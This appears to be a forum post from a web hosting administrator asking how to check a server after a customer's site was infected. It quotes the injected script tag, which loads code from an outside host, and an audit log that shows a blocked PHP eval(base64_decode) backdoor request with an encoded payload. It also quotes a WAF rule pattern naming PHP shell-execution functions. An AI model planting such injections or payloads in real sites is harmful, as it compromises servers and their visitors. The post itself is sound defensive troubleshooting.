One of our customers appears to have had their website infected and they have been told:
"Just for your info, found 173 files infected with a script addition:
<script src=http://aguera-vidal.com/images/gifimg.php ></script>
You want to tell the Naved about this as the hack has also infected
some phpwebsite templates, so they need to check those as well."
Can someone tell me how best we can check whether or not the web server is infected with this virus? I'm surprised to hear that comment any way as I naively thought that ClamAV would be protecting the server.
Their website designer is based overseas and I hope that any issue came from them and will not affect any other websites.
Very grateful to all for any help. Many thanks, in advance.
EDIT: I have found an ASL file for this domain in /var/asl/data/audit/20100319/20100319-0626, but not sure that this shows any problem:
EDIT 2. I also did a scan of that domain which suggests that nothing is amiss:--906db53f-A--
[19/Mar/2010:06:26:25 +0000] bUVspFLFTwQAADnDTOMAAAAY 93.185.104.23 34859 82.197.79.4 80
--906db53f-B--
POST /index.php HTTP/1.0
Host: domain.co.uk
Content-type: application/x-www-form-urlencoded
Content-Length: 1877
--906db53f-C--
tmp_lkojfghx3=eval(base64_decode($_POST[chr(101)]));&e=ZXJyb3JfcmVwb3J0aW5nKCR6PTApO2VjaG8gIkVSU1RGSyI7ZnVuY3Rpb24gZigkYSl7cmV0dXJuIGZ1bmN0aW9uX2V4aXN0cygkYSk7 ... ...
--906db53f-F--
HTTP/1.1 403 Forbidden
Last-Modified: Fri, 19 Mar 2010 01:23:20 GMT
ETag: "1108552-3ff-4821d31529200"
Accept-Ranges: bytes
Content-Length: 1023
Connection: close
Content-Type: text/html
--906db53f-H--
Message: [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "833"] [id "340011"] [rev "1"] [msg "Atomicorp.com WAF Rules: Generic PHP exploit pattern denied"] [data "chr(101)]));"] [severity "CRITICAL"] Access denied with code 403 (phase 2). Pattern match "(?:chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;" at REQUEST_BODY.
Action: Intercepted (phase 2)
Stopwatch: 1268979985640612 195069 (4764* 191644 -)
Producer: ModSecurity for Apache/2.5.11 (http://www.modsecurity.org/).
Server: Apache/2.2.3 (CentOS)
--906db53f-Z--
clamscan -r /var/www/vhosts/domain.co.uk/httpdocs
----------- SCAN SUMMARY -----------
Known viruses: 1307581
Engine version: 0.95.3
Scanned directories: 641
Scanned files: 3021
Infected files: 0
Data scanned: 27.25 MB
Data read: 17.79 MB (ratio 1.53:1)
Time: 26.105 sec (0 m 26 s)
[root@plesk2 ~]#